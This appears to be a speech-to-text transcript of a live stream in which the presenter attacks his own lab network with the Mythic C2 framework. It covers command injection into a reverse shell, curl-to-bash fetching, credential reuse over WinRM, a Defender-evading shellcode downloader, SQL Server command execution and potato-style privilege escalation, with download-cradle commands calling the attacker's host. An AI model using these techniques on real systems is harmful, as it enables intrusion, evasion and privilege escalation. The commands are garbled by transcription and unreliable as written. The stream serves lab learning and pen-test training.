Alright, yeah. We should be live now. We should be live. I'm making sure that I watch both chat as much as possible. Yeah, it's open there. So I watch your messages as much as possible. Yeah, if you guys can type in, or actually I can do that. Yeah, hi there. Alright. Everything seems to be set up now. So officially welcome. Let me know if the music is too loud or not. I think it's fine, I believe. Yeah, I think it's fine now. Yeah, alright, so welcome everyone, guys. What we're gonna do now is, as mentioned in my tweet, some AD attacking stuff with Mythic C2. Yeah, so have my shisha up and ready here. I think my environment is ready as well, so we're gonna see how that goes in just a while. But I'm gonna give you a nutshell about how my environment is actually looking like. We have like, so there are things from here where they are not now working. For instance, you can see the Helk, you can see the Suricata, and you can see the Squid proxy that's saying they are disabled. That means in future videos, I'm planning to successfully integrate them into my videos, so we can pick a different side of things. Apologize. For instance, we can try to detect attacks, we can try to detect C2 traffic, we can try to do SEO inspection and set up the intrusion detection system and potentially intrusion prevention system. We'll see how that goes, but this is all a topic for a future episode. Right, so now just when you see currently disabled, just so get it away from your mind. Right, now we have the Kali, of course, which you're gonna test from, and my IP is mistaken here, so like that. Then we have the PF Sense, which I used as a firewall, and this wire separates the external simulated network from the internal one. On the internal one, right now we are having one B-box, which we can use for some kind of attacks. Then we have the domain controller, of course, we have some Windows 10 client, we have some SQL server, and all of them right now are connected to InvokeBit, which is connected to Helk, but as I said, Helk is not configured that much. I don't have enough Elastic rules as well as the dashboard to visualize everything properly. So for now, for today's stream, we're gonna exclude that, but we're gonna perform some AD exploitation with Mythic C2. Now you can see all my VMs here. It's kind of noisy, but I think my PC can handle that. So that's my Kali box here. Let's first make sure that the Mythic C2 is up and running. I'm gonna showcase my config there, how I've set up the whole C2 framework. I'm gonna go through, yeah, here. Let's do tmux, cd opt mythic, and now do. What I want to showcase is first do sudo-i to make myself root, and now go to C2 profiles. And as you can see, I have only the HTTP one. So here I just want to showcase how I've configured that into C2 code and config.json. That's the main config file for the HTTP profile. Now I'm gonna start a Firefox instance and navigate to Mythic just to showcase what that config file is doing. So right now I'm using, so Mythic generally use what's called C2 profiles. These C2 profiles are used for capturing the C2 callbacks. So this can either be, as soon as I know, HTTP, currently we're using that. It can be also SMB, and it can be, I believe, no, actually, WebSocket. I believe WebSocket, but I'm not 100% sure. We can actually research that by saying C2 profiles, Mythic C2. Not sure my speed is slow here, but never mind. Come on. Oh yeah, zooming my console is a thing. Yeah, thank you so much. I'm gonna zoom it out. All right, so these are apparently the channels Mythic C2 is using. So we have DNS, HTTP, Slack, WebSocket, Dynamic HTTP, which I'm not sure why was a difference there, and SMB. So we're gonna leave these for future streams and videos where we're gonna showcase how these actually work. But for now, we're gonna use only HTTP. And in my case, the HTTP is configured for HTTPS. How that is being done is... Hope that's better now. Yeah. How that's being done is... I'm on the TV, yeah. Nice. How that's being done is that we have to set up a self-signed certificate that can be done via simple OpenSSL command. You can find it yourself on Google. Specify the certificate here, specify the key here, specify the port to be 443, and use SSL to be true. And that's it. So we have now Mythic as a HTTPS, the C2 profile being set up to HTTPS. Alright, now the agents are the one who are used for initial connections and callbacks. In that case, I have set up and used Apple and Mervin. Now Apple is .NET based, .NET framework 4.0, meaning that with that we can target only Windows machines, while Mervin is Go based, I believe. And with Mervin we can actually target Linux machines. We can target FreeBSD machines, macOS, OpenBSD, and Solaris, which is pretty dope. Now on the Windows tab, we can see we can do, oh, that's an Apple Mervin. We can do default executable, raw, which is gonna be the shellcode, and shared, which believed to be a DLL. So yeah, that's in a nutshell my Mythic setup. Now of course this is my previous testing stuff, so I'm gonna just hide that. And let's continue from scratch. Now my first target apparently would be that beer box right here. So in the case of the demo, I made everything accessible to the NAT because I didn't want to set up tunnels because it would generate more traffic, meaning that my stream can lag. So just for better experience, I set up everything to be exposed from my Kali. Are those other C2s part of Mythic or just listeners to different payloads like Mervin and Apple? I'm not sure what you were asking about, but I'm thinking you're talking about the C2 profiles. So in a nutshell, this is how you connect to the Mythic, to the server, and this is the protocol which is used to connect to the C2 agent. So pretty much imagine it like that. This is the agent, and the agent is gonna be used the profile to connect to me. So that's in a nutshell. Alright, so the first target would be 172.60.60.132, I believe, port 8080, and here we have some buggy web app. Now on the build app, let's go there. Of course we have multiple ways of pulling that. I am not dedicating that much attention into initial compromise. Of course that can be phishing or some kind of service exploitation. In that case, we're gonna stick to simple scenarios. Now here let's do debug and inspect some vulnerabilities there. I highly recommend guys sticking with that app, and if you are new to cybersecurity and pen testing, I definitely recommend you going there and downloading that on yourself. Why? Because what that thing is capable of is, that's a buggy web app which has multiple vulnerabilities inside. For instance, we can see there we have the HTML injection, some kind of SQL injections there, we have broken authentication, cross-site scripting, all the basic web stuff you need. So if you're just new to that, that application can give you a nice start, right? In that case, because we want to, oh, something frees off my Windows 10 client, so let's resume that. In my case, let's stick to very basic stuff, so we can do command injection, right, hack. And now command injection is apparently when you like do some command, for example, who am I, and if it's vulnerable, you can force the execution of another command, for instance, ifconfig. Now you saw that by specifying the pipe, I executed ifconfig and the whoami was not executed, right? So there is a lot of syntax for doing command injection. For instance, that thing most likely is doing ls lookup, and let's do it like that. So we have some kind of address. Now let's do who am I, and we have data. So the same logic I described in the terminal is integrated on that pane right here. All right, so let's get a shell, right? One option is that we trigger burp, because I'm not sure how many characters we can type on that, but looks like we can type a lot. So let's do it like that. And do we have NC? Which NC? We have. So let's set up a very basic listener. So cd desktop, mkdiv stream, cd stream, and do nc mvop 443. The address is used because of the Mythic, so let's do 8443. All right, now it works. Do nc 170, 192, 168, 74, 134, and 8443 bin bash. Look up onto that. We have connection. Do who am I, and we have shell execution. So that's one of the very simple ways on how you can do command injection into RC, into shell. Of course, on the B box there are way more different ways of doing that, but just I thought it was nice to showcase that. And now we're on the system, right? So let's do if we can do something. So it's time for Vito Privesk. Now, in terms of that, I want to do cd, or actually copy opt piece ng limpiece.sh to here, host it on Python web server, and just download it. So cd temp lsla, and do we get my IP and limpiece.sh. Another cool way of actually executing that is, instead of downloading that, we can do curl, the same thing, so that, and we can pipe it to bash. So that's gonna immediately read it from remote host and directly execute it. So the first thing we see is a super old kernel, but let's give it a time to go. So here we can see another user is present, B, which we already compromised by using default password. We chat. I am watching simultaneously both chats of YouTube and Twitch, so I have one here and one there. So I'm doing my best to keep everything in note. Now here the previous checker says that there's a lot of exploits, right? But we're not gonna stick into exploits because usually they're risky and sometimes they can break up the box. Come on. So based on limpiece config, apologize output, we can see that we have some kind of a DB username and password. Of course, we can go ahead and read the database, but there is nothing to actually see from there. So for that case, I'm gonna try to just switch user to that specific one. So I can do sub bug, who am I? So that was not the case. So let's try importing a TTY session, which means the shell is more interactive, meaning that we can do more things. So which Python 3? Nope. Which Python? Alright, Python -c import pty.spawn bin bash. Alright, now let's do sub to bug, and we have B. So it's always important when you are doing some kind of a Privesk and works with Linux to always have a stable environment as possible. As stable as possible, right? So in the best example, in the best scenario, we want to have an SH connection, because then everything works just nice. So yeah, we're B now. So let's do sudo-i, the worst thing I try, do bug, and we're root, right? So if I do exit and do sudo-l, we can see the misconfiguration that allows the B user to pretty much do anything is root, meaning that if we do sudo-i, we have root. Alright, so far we compromised a Linux machine. No Mythic C2 yet. Of course we can chain the B box with Merlin agent, but do we want to do that? Actually yes, let's do that. So let's do create a new payload, Linux. Now there's default. Alright. Next. All the available commands are already imported and you can choose as you can on Apple, but that's completely fine. So do next. Go to HTTP, specify my IP here. And make sure the port is correct, server 443. Go back interval 10 seconds, let's make it 5. And let's do next. Merlin dot, not sure how to generate in Linux, maybe elf? Maybe. So I'll create a payload. That's the first time I'm testing such thing with Mythic, so I'm not sure if it's gonna work. I kinda came with either trying to solve an AD box, not yet, we're on the Linux box, but we're gonna chain into an AD environment just now. So let's download that. Let's do here. Alright, so it's an ELF executable, so it should be fine. Let's do the same web server again. Now do cd temp, we get the IP. Chmod plus x to Merlin. And then do merlin.elf. Cannot execute the binary file. I'm thinking that's because the B box is having way too old kernel and shell that is not maybe compatible with that. Not sure. Never mind, it failed, but I'm not gonna lose that much time debugging onto that. But let's continue from our interactive shell. So let's cd into root and see what we have. And we have some file called creds. So let's read that, creds. And we have some kind of username and password, which turns out to be like a domain one, because we have first letter of the name and then the family, which is a typical naming convention for domain users. Now the next thing I want to do is to see what I can do with that credentials I found. So I can do crack map exec, do smb, specify the IP of my local network, and then do username is gonna be jsmith and the password is gonna be my secret pass1. So let's run that and see what crack map says we can do. So we have a valid domain username. As you can see, we have a successful SMB connection towards the DC and towards Quant 01. Actually, yeah, Quant 01 and SQL 01. So let's do WinRM instead of SMB to see if we can actually go there and perform some kind of lateral movement. Do you see the vulnerability here? No domain user should be allowed to log on to the domain controller, especially if it's not a domain one. Right. So I've prepared a little bit of a path for this demo, so we're not gonna do directly hop on the DC. Even though I believe there's no valid misconfiguration for previous, but never mind. What I intended is to jump on Quant 01. So let's do evo winrm. What was it? 100. Then do username is gonna be jsmith, and the password is gonna be my secret pass1. Run that. And there we are, we have a shell. So what we did so far is I used the bbox into getting some command execution, I get a shell there, and then I jump to Windows 10 client. So my attack path was like that. So I'm not sure it's gonna be ugly, but let's see. Yeah, it is ugly. Alright. We can do OSMD injection here. Alright, and then here we can do like Evo WinRM. Nice. And by the way, I want to showcase one super cool feature I found in Obsidian. So I can do, let me just, give me just a second please. So apparently in Obsidian you can create what's so called canvas. In this canvas you can pretty much map, especially I use it for that when I do pen testing in AD internal environment. I use that all the time. So for instance, we can start with the entry point. Let's imagine we did an nmap scan, because we didn't do, because I already know the IP. So this led me to bbox. Alright, I can do nmap here. And I can exactly do nmap into OSMD injection. And then the bbox led me to client 01, and of course you can link the actual nodes you have in Obsidian, and you can link screenshots. Now here I can do creds on root into Evo WinRM, and I'm there. So when you have large environment, you can map your whole file and your progress using the canvas, which is super nice. And as I said, the best thing is that if I create a node, I can directly link it here, as well as some screenshots. Nice. So let's continue on that. And now let's change some C2 traffic. Right. What I want to do is, I believe we have Defender up and running. So something happened with the VM. Please don't die. It's not that, but I'm not sure why. There's no GUI here, GUI. Never mind, if it works, looks like to be nice. Alright, so in that case, let's generate some enc.bin. Let's develop a sample shellcode loader and let's inject it into bypassing Defender. That's gonna be nice. So let's start from the beginning. Let's do generate new payload, Windows, do... Actually, which one should we test, Apple or Mervin? Let's do Apple first, and then we can do Mervin. I want all the commands. Next. And by the way, that's one of the coolest features of Apple, because you can specify which command you want, and based on that you can minimize your binary, so it has more stealthness in it. So yeah, I'm just gonna include all of them. Do next. Of course, HTTP. Again, specify my IP 192.168.74.134. Do 443, 5 seconds. Next, and let's do apple.bin. Create payload. While that is being creating, I'm gonna open another VM, which I use specifically for developing stuff that I so much enjoy. So yeah, I use command VM because I find it super nice about when you have development background to use on it, because now Defender by definition, you have all of built-in tools, Visual Studio pre-installed, all the stuff you need. So for those of you who don't know, command VM is just a weaponized Windows virtual environment. Yeah, so just like Kali but Windows. Does it do beacon sessions similar to Silver? I'm not sure it's doing session like Silver, because in Silver you can actually spawn a shell, like you have a Netcat or a Metasploit shell, but with Mythic that's impossible, so you have only beacon callbacks on specific time frame. Is this payload for persistence? It can be used for anything, but now we can do... we want to upgrade the WinRM shell we have into Mythic C2. That was the main point. So let's open a Visual Studio and let's find... Come on. Why you always have to be updating when I need you? offensive, C++, security. That should be enough for Google to find it. Yeah, there it is. Now here on the Windows API examples with HTTP, I have shellcode downloader. I'm just gonna go ahead and copy that, create a new project, which is gonna be C++ based. So here, DL. Why not? Just DL is fine. And the shish became way too heavy. Need to remove one of the coals. Alright, I'm back. What happened now? Alright, we're here. I can just directly paste that. The IP is already configured for that. And that need to be modified. So what that is the size of the raw shellcode we have. In that case, the shellcode is ready. I can download that and copy it to here. Actually, I'm gonna create a new pane. So move downwards Apple to here, and then do RSLA, and we can see the Apple size is that. So how the shellcode downloader works is, come on, oh, it's here. All right, just specify the size and increment it by 1. All right, now all this code is gonna download the shellcode into a variable here. So we have a variable, apologize, the variable is there, and all the code is gonna populate the variable with the actual shellcode we need. The next step would be to, of course, execute it. So for that case, let's use the file map API. So shellcode execution, file map, and there it is. Copy and paste. That's why I make the repositories. Makes super easy just copy and pasting stuff. Alright, now we need to include the things we need. So that, if it's not already included, yeah, Windows.h is, but the IOStream was not. So now it works fine, and that's it. Alright, so let's compile that to x64, release, compile. Alright, there it is. Just open that with Explorer, paste that, copy the file, go to carry, do dolphin here, and paste. The magic of the VM. Alright, so we have the dropper, we have the binary file, which we need to rename as actual enc.bin, because that's what the code is built upon. So the code is actually doing enc.bin. Alright, so we have that. Now with that I can do OpenSL. Nope. So I need to find the command in my notes. Alright, there it is. With that command you can generate self-signed certificate. And with that command you can start a simple Python HTTPS server, which can be found online. Alright, so now we are pretty much ready. So first things first, let's download the dropper. So let's do cd documents is fine, I believe, but let's do it on the desktop. Do we have something in there? We don't, so let's do invoke web request, HTTP. Actually, let's do it like that. Because if we use HTTPS, we need to accept the self-signed certificate with PowerShell, which is kind of like annoying. Now do the IP. What was that? dl.exe. dl.exe. Let's see if Defender is gonna flag it. Nope, it did not flag. So now the web server is running. That should read the binary should download the shell code and then execute, and we should have a Mythic callback. So let's go on the callbacks. Let's execute dl.exe. And let's see if I didn't mess up anything. Looks like I am. Come on. Or maybe Defender called us. Which will not happen, by the way. Nope, the file is there. Defender didn't catch us. So let's do cmd.exe, cdl.exe. No callback. So let's get back to commando. Now on that, I want to test it from the commando to make sure it works. That's a crucial step of actually testing your payloads. Now from the commando we see it works. Now we should get a callback, and we have. So we know something's messed up with the AD environment. So what can possibly be the reason? Maybe use the full path? Maybe. Nope, not the case. Actually, I can remove that one and move that to here. Yeah. Alright, another thing that comes to my mind is actually do x3 FTP. Do username jsmith, password to be my secret pass1. Let's try FTP. Because something can be broken with the winner emptying. As soon as it works on my commando, it should work here as well. Alright. Don't tell me the firewall is blocking us. The window is present, so it hangs on the DL function, because the very next line I'm hiding the window, but in that case it's timeout in here. So most likely it's the firewall. Let's see if I can do partial curl HTTP or actually HTTPS. But how works the curl like? Why you're so slow? Alright. I hope the stream is alright though. I'm not pivoting. As I mentioned, I'm not using pivoting because this would take up another more network resources, and I want my stream to be smooth, so I just exposed anything, but doesn't look like the case. Maybe that's the one I need. Alright. Invoke REST method, what the fuck? Oh yeah, that's it. Alright, so that, and then do IWR HTTPS. Let's debug that. Skip server check. Oh, in PowerShell 5 it's a bit harder. So let's try it that way. Now it works. But why doesn't it work from the downloader? Yeah, it works now. Yeah, alright. Let's try DL now. Nope, alright. So I have a different approach for that. Luckily, I have another tool for the job. So let me navigate to my GitHub. Let's see if that's gonna work. And then we can weaponize it into a single file. It apparently does the very same thing, but in C#, which can be integrated with PowerShell by a type. So I don't need to sort the file. That works perfectly fine. Or 8443 to be honest there. No, actually let's do it on the port 80. Why not? Alright. Don't want that. That should be nice. So let's try to execute it and host a Python server. Oh my god. So it's not gonna happen that easy. Yeah. Welcome to the debugging part of the series, guys. The IP is correct. It did not make a request. So I'm not sure what's failing here. Above does not exist. What do you mean by that? Let's get to the main. And buff should be here. SD. Buff 1. Oh, alright. Yeah, my bad. There it is, the callback. And there is the callback from Mythic. Alright. So what I did is use the C# version of the code you just saw from my repository. I use the C# version as a PowerShell snippet, so we can go ahead and further automate that by copying the code. I can then store it here. Let's say do vim. What's the name? Naming is always hard. Let's do run.ps1 or md. Set paste that, host that with Python server, and now we can execute it from here. For instance, we can do ix new object. Let's see if that's gonna get called by Defender. New object net.web client download string http. and read, or what was that, run.md. Alright, for that to be the case, I want first to make note of the callback, which is that number 10. So let's run it. We have the callback now. Let's wait a little bit because it has some kind of a sandbox evasion stuff. And guys, we have a Mythic C2 there. So from now we can operate from this window on and only. So as you can see, the defender, actually I can verify it from here. The defender should be turned on. Yeah, there it is. Alright, nice. So yeah, now let's choose actually one of the callbacks. I'm gonna exit that one because we don't really need that. I'm gonna use that one. So let's do help to see what we can do. Now, as I said, this is not river, we cannot do direct shell, but we can do other stuff. Normal day in the life, yeah. Totally, yeah. So on the help, we can see all the commands the Mythic has and supports. So I'm mainly interested in PowerShell and PowerShell import. So let's see how that works, by the way. Let's do PowerShell import, and that should bring us a window to select the file. Now while that is here, I can do cp opt power up SQL. No, not the case. So let's find it. Power up SQL. Come on. I hope the stream is alright though. Alright, there it is. Power up SQL. Go to view row. Copy the link and do wget paste. Alright, now we're here. Now let's go to Mythic back. Actually remove that, that, and that. Just select file. And do... no, not that, but that. Task. I'm gonna hide this callback and this one. So looks like this is done, so I can do PowerShell. And yeah, alright, so now it's done. I can do PowerShell get SQL instance domain verbose. Let's see if that's gonna work, or the defender is gonna catch us if we're gonna need to use AMSI or something. So, oh yeah, there it is. So I'm not sure why it errored out, but we apparently saw that we have a bunch of SQL instances. Now in our environment, the next target would be that SQL 01 here. Yeah, so we found that. Let's try to exploit it in some way. So what was the thing? Let's try get SQL query, do instance. Oh, actually we need PowerShell before that. PowerShell. Apparently the Apple agent should be doing some kind of AMSI bypass because the defender is not flagged, even though I didn't manually bypass that. So I wanted to test it, so we can do copy of that, paste that in quotes, and do query. Let's see, to be select version. Alright, so we have we can execute queries. I'm not sure why that's erroring out, but it works. So let's use, instead of get SQL query, I'm not sure about the syntax, power up SQL cheat sheet. Come on. CMD. Yeah, invoke OS CMD. That's what we need. So invoke. Yeah, all right. OS CMD instance to be that, and CMD I believe should be, let's try with who am I. Finish the syntax, run, and let's see what we can see. So not the case. I think the syntax is wrong because here we have just defined the targets, and or is it? Let's try OS CMD. Yeah, that's the thing there. Or maybe I have mistaken it. So let's try it again. Oh yeah, it's SQL OS CMD. All right. In the parameter command, so it's not the CMD but command to be who am I. So let's try it again. All right, we are a system. So here are like two vulnerabilities in the real scenario. First, you're gonna report that we can execute directly commands, meaning that we have sysadmin rights, because how that works is that initially it checks what rights we have and if we can assign rights to ourselves. So if we don't have the rights, it's gonna go there and try to assign the rights by our own. If we have the rights, we just enable expcmd shell and execute the command. That's how it works. And the second vulnerability, which is worse to be honest, is that the database is running a system, meaning that if you can compromise that, we can pretty much like have a system shell. So now let's try the very same syntax we have here. So I'm gonna do Python HTTP server, and now instead of the command who am I can do PowerShell and do base64, because always when you do something like databases and something with a lot of quotes, it's always the best idea to do with base64 syntax. Now for that case, I can do posh, I can do profile, and here I have the following function: invoke cmd to base64. For instance, I can do invoke cmd to base64 and specify IEX, or actually, what was the syntax? Who am I? Yeah, alright, so I can do IEX, new object, net.web client, download string to be HTTP, the IP 74.134, and do run.md, and it automatically copies to the clipboard, but I missed something. I missed the quote. So yeah, let's finish the syntax. Just like that, it's copied to my clipboard. Go back, and now on the Mythic, just specify encoded and paste that. Alright, so let's see if that's gonna work. Run it, have my server up and running there. I think it already requested it. Let's see if that's gonna work now. No callback. We have the bin. Let's wait. We have the callback to the shellcode. Let's wait for the sandbox version, and boom, we have another callback. Now this is red because I'm not sure why, but I believe as soon as you have some kind of a shell on domain controller, or if you have some kind of a system shell, it's in red, right? So I can do another callback here. I can do shell who am I think that was the syntax. Yeah, I think that should be it. Yeah, oh, it's the network service, which is super strange. Indeed, super strange, because I was thinking that I saw on the who am I output that we were system, like right here. But apparently we got a beacon as network service, which is nice. So let's try to escalate our privileges. So let's do shell who am I /o, see what privileges we have. Of course, if you're trying to be stealth, wait using who am I, because you know that's bad. You're gonna get fragged so easily with that. Group names, privileges, same impersonate privileges enabled, meaning that we can pretty much become system. So same impersonate, we can use some kind of attack like juice potatoes, like potato attacks, or print spoofer, I believe, to become like a system, right? So in that case, we have several ways to do it. We can either go RDP there and establish an RDP session and then do that with Wimpon, which apparently is a tool from Sheet Secure which has automated stuff for all of this junk, but we can try the manual way because we're using Mythic, so we can do print spoofer, we can do print nightmare, yeah, it's a let's see if I'm not mistaken. Oh, all right. So we can use that. I think should be a release, or we should compile it ourselves. Yeah, there is a release, so let's download that. I think it's an assembly, so we can directly execute this in assembly, but let's see how that goes. So I think it's downloaded now. Yep, it is. So let's do download print spoofer to here, host it again. Now, oh no, it's not an assembly, it's a standalone binary, but we have execute p. Yep. Now we need the execute p to run, but oh, that's a .NET assembly, so that's not gonna work for us. I think the Mythic has the module for p. Let's see. Oh, we have a direct print spoofer. all right, that's something. So let's test that. Yeah, we don't care anymore for the execute p, so let's do print spoofer. Now what arguments do we need is based on that. So print spoofer .exe, I, C, and command. That's gonna spawn a shell. I want just a single command, which is that. So C and the command we want. Alright, so in that case will be print spoofer, and then we need to pass the argument. Alright, so print spoofer, let's try help. Yeah, that's module is cool. I was amazed as much as you are. I just saw that. I kind of start to like Mythic more and more. Oh yeah, so we can pass arguments like that. So we can do print spoofer and then do -c and then do the same PowerShell base64 encoding from here. So that one there. PowerShell in quotes. Alright, let's test that. Make sure my web server is running. It is. So let's see if we can get first callback to run.md, the second callback to enc.bin, and the Mythic callback, the third stage of the execution. While we wait, I'm gonna make sure my calls are alright. Still nothing. Come on. Invite argument E. Also it passed that as a different argument. What? All right. Let's try maybe single quote. Nope. It failed with argument most likely again. Yep. So in that case, we can do PowerShell IX new object net.web client download string HTTP run.md. All right, and do double quotes there. Nope. Oh, wait. It maybe worked that time. Found privileges, impersonate, name pipe listening, create process user, alright. Nothing. Oh, I have a typo. HTTP, like that. Let's try it again. Yeah, thanks so much. Oh yeah. Am I missing something with the print spoofer? So command that one. So maybe I'm thinking that I forgot something again into the command. So download string http // my IP, which is correct, run.md, which is correct as well, PowerShell IX. Let's do PowerShell invoke web request HTTP. Let's do it like that, just to see if I can get a simple like request there. Is it possible that Defender is catching me? So I'm suggesting that since the Mythic Apple agent is not that brand new, it's super well known, and it is there for a lot of time, it can be the case that it uses the like old version of that. So what I can try is drop that on disk and then try to execute it manually. So that's another part of doing that. Of course, that's not the most OPSEC thing to do, but you know, why not? So let's do a port and then do select file. Yeah, that one. Doing a great job, mate. Have to go, but surely before your closer. Thank you so much for the time, man. Appreciate you. And I hope that's useful for every one of you. Upload file access to, oh, so it tries there. Alright, so let's do it again. Oh, not that. Let's try PowerShell or actually shell. What was to get the current directory? Can I do pw? Can I? Nope, so let's try PowerShell pw because I'm sure that's an alias for that. Alright, so let's do PowerShell. Or do I have a file browser, by the way? I think I have file browser, yep. Yeah, the live stream will be saved. You can watch it whenever you like. Users, maybe? Nope. Alright, so let's try... Oh, wait, we have something. Alright, so here... Why they're not here? Never mind. Oh, it's taking so long for that. Oh yeah, alright, so we have public, so we can do it there. Let's try upload. Choose the file again. That one. Into destination to be C users public. Task. I'm gonna actually hide that. Come on, please. Alright, never mind. And hide that. Oh my god, my Mythic is broken. Alright. Now it is there. Alright, so we can do shell C users public print spoofer 64.txt. And let's go like see who am I. No, we didn't. We didn't do that many stuff, but yeah, feel free. The live stream is gonna be recorded. It's gonna be uploaded, so no worries. Alright, now we didn't get any output, but let's try instead of who am I, do PowerShell invoke web request. My dog doesn't like that. So that's 74 134. Let's see if we can execute now. If we can get a callback. We did. Oh, I'm not sure from which exactly. So let's try it again. Oh yeah, we have a callback now. Alright, nice. So we can do, instead of invoke web request, let's do the previous syntax for getting a shell. So ix new object net.web client download string, can do http 134 run.md, and let's see if that's gonna work now. Alright, we got that. Now if that's gonna work, we're gonna get the enc.bin. We have that, and the callback should appear. So yeah, I'm not sure why that is red, but you know. Alright, we have callback. So callback 13. Let's do shell who am I. Network service again. That's not supposed to happen. Fuck fucking dog. Oh yeah. But why that's the case now? Oh, now it appeared here. Can I do... Oh, nice. Alright, so it takes time, but apparently you got it. But why a network service again? That's super strange. Maybe I'm missing something there. Or maybe the PowerShell module is not that good, so we can try NCAT 32-bit portable, that one here. Apparently that's gold, I'm not sure why, but that's not getting called by any AV there. Not sure why. It's still super relevant, and the AV vendors just don't catch that. So, download. Let's use their demo as they explain things, so maybe that can be better. But first, download that. Now let's upload it. So move downloads to here. Host the Python server. Do upload and cat.exe to see users public. Upload that, and now let's follow their syntax. So they're stating documentation just like that. All right, so let's do it. So shell see users public print spoofer 64.exe C to be users public and cat.exe, my IP to be 192.168.74.134. The port is alright. cmd.exe. Maybe the E is gonna break the syntax again. Not really sure. So let's do it like that. Set up the NCAT listener. Yeah. No, we didn't get a callback. Why? Do we have that file there? So shell dir see users public. We have it. Do I have a type somewhere? Shell, maybe use that. Oh. Maybe use that. Think my syntax can be broken. Nope, it's not. The IP is correct. The port is as well, indeed. Let's try without the cmd.exe to see if I can get an initial callback. Just to ping that the NCAT can reach me. What do you mean a bit left? Alright, that's not gonna happen. So let's try a potato attack. So yeah. Do we have some potato integration here or? Oh. Nope. So let's decount that. We tried that, didn't work. We can try that as well. So let's try sharpf is potato.exe. Let's try that. So no release, we need to compile it. So yeah, let's do it. Command VM, here we come again. So yeah. Can I compile it right off the bat or? Yep, we did. So bin x64 release that. Copy it to my Kali. Alright, now let's rename that to p.exe, why not? And let's upload it again. So use Mythic, upload, let's do p.exe, do c users public task that. The file should be there, so let's try shell c users public p.exe -h. Have you learned all these skills from the OSCP course? No, not only. Most of the experience comes from practice, so yeah. Alright, now turns out that to be working, so I can do instead of -h. Let's see how they are doing that. So p PowerShell.exe. Oh, let's try that. Let's actually try that to see if we can get a system. Set content c users public test.txt. Let's try that. It looks like it worked. So let's see if it generated the file. There is a file and something in it. So let's do shell type and do test.txt. Hope we have system this time. We are. So in that case, instead of doing PowerShell a who am I, we can do ix new object net.web client download string http 24.134 run.md, and that should be nice. Alright, we have the first callback, meaning we should get the second just about now, meaning we're gonna get the third just about now. Come on. And why the user is again SQL01? I just don't get that. Let's try show who am I. That's super strange. Let's try the other way. So instead of doing PowerShell.exe, let's try c users public anchor.exe. Let's try it like that. Get an anchor show. So when I do a walk file, it says I'm a system, but when I get shell, it says I'm a network service. So it makes me think that's something super wrong with the configuration of that. So I'm not getting any catch there. Maybe do cmd.exe or just do like that, maybe. Oh, it failed. I'm really not sure what's going on there. P.exe is that sharp PFS potato, so that one here. I can link it to you. It's failing now. Where is the CMD path? Let's try like that. So instead of PowerShell.exe, let's try C Windows System 32 cmd.exe, and now specified /c C users public.exe. That let's run it. The strange thing is that the walk file says we have system, so we can execute the system, but when it comes to PowerShell, I'm not sure why it's not doing system. So I can do who am I again, and C users public, let's do that txt. Let's try it like that. And it no longer works now. Let's see if the file is being created. Show dir there. Maybe it needs absolute paths. I'm doing absolute paths. That was the strange thing. We have test 2, but alright, let's do shell type test2.txt. So I'm using the full path for the p.exe, full path for the cmd.exe, and full path for the output file. Oh, it fails now. Not sure why it fails. Maybe if I can try the first command, which is that. I'm not sure if I broke something, so instead of test, let's do test3.txt. Now it worked. Let's do type C users public test3.txt and do shell, of course. Shell. And we have system. I'm not sure what the heck is going on here. Like, honestly. Can I do, what is PowerShell.a? PowerShell A. The fuck? Maybe if I do Not sure what that is. But here we are a system, alright, so can I do like, is it A something for the, oh it's a, oh my god, it's a fucking argument. It's a fucking argument, that's why I got the callback as I got it now. Yeah, the, oh my god. So the A apparently is an argument for the potato itself, and the last time I specified my callback here, and of course it's gonna get executed as an SQL service because I executed here. Now I need to execute it here, so I need to do IX new object net.web client and downward string and do HTTP 74.134 run.md. Now this should work, at least that's what I believe. First one, second one, fourth one is a SQL service again. Oh my god, that's getting annoying. So here, show who am I? I'm really not sure why that is. Can I do stuff like that? Maybe 8443. Can I get a callback now? Please? I have a callback. Alright, so let's try it again. And now specify cmd.exe. Oh, it's an E. We need to specify exe.cmd.exe. And now maybe D is breaking the syntax of the, yeah. Most likely the E is breaking the syntax of the, I can do it like that. So I can do, I can run that in base 64. Now do PowerShell like that, but I need to specify the base 64E as well. Oh fuck. Damn. Yeah, if I just do E and that, this should not work either, because with dash E I'm breaking the syntax of the two. Oh wait, we have a shell. Finally. When the mythic fails, the NCAT comes to our job. Finally it works. Oh my god, yeah. Whew, nice. So I really can't understand why the IEX was not working. Like, why that? And can I try with that and do do that. Can this work? I mean, why not? Or maybe something to do with the staging. I am really not sure. Maybe the staging breaks up the syntax of that. Yeah, we have again the network service. I can do shell who am I. But now since we have system, I can do things from here. I can do PowerShell, E, paste that, and now we should get a system shell finally from the Mythic C2. Come on. Come on. Not the case, not sure why. Let me try it again. Or maybe Defender called us, not sure. PowerShell, E paste. Yeah, the binary has been executed. Oh, maybe I'm getting some errors for the entities thing. So I need to go here and do vim run.md and just disable some sandbox evasion checks. Not that, yeah, that one. Yeah, I need to remove that one. Maybe that's gonna work now. Come on. Still not the case. I'm getting 0 out of something. I can try the CPP version I just created, so let me try upload. Use the dl.exe into C users public task that. Now let's do cd c. During the OCP, you have the ability to pretty much use any C2 as you want. So you just need to be not commercial, meaning that Metasploit Pro is forbidden, as well as some paid one like Brutrato or Cobalt Strike. But anything like Mythic, Covenant, Silver, Metasploit, and the normal version should be fine, so don't worry about it. Now let's try dl.exe. Oh, there we are. Something happened. Oh, I'm not sure what. Maybe the stated that it was supported. I'm not getting a callback here. Yeah, so my shellcode stage is not working. But let's see how other we can change. With what other things we can change Mythic. So let's do PowerShell. All right, ls. All right, we can do ix new object net dot web client download string to be 68 74 134 run dot md. Let's try the normal way. Oh, something's happening here. I'm not receiving a callback. Oh, I received callback. But why am I getting the 0 here? super strange. Let's think about that. And why is that 0 coming from? Oh, I think it's something to do with the process injection thing. Because here I'm trying to do process injection into maybe SVC host, maybe. When you write code, yeah, when you write code, but you forgot about it. We can do explore.exe, just like that. So let's see if that's gonna work. Oh, something happened. Yeah, sorry. Oh, it already exists. So I need to do exit, PowerShell again, paste. Not the case. What else we can do is find the system process. So instead of SVC hosts, or actually SVC Explorer, let's try which one? We can try no shellcode injection at all. So OSCP code snippets, that's a public repository all of you guys can use. There you have shellcode runners, then do here, that's the buffer. I need only that part. Let's try it like that. So I can do here. Actually, I don't need to break something. I don't have process to inject into, so I can remove all of that, and I can place my code here. Now I don't need to XOR it or decrypt it, so here, that way should be fine. Pay ADDR. What's that? Or is the not sure. Pay ADDR. Oh, it's the virtual walk. All right. Instead of payload size, I can do size of both, or that was C++ syntax. Oh my god. All right, let's do it the easy way. So I'm gonna do cat run.md, copy that, 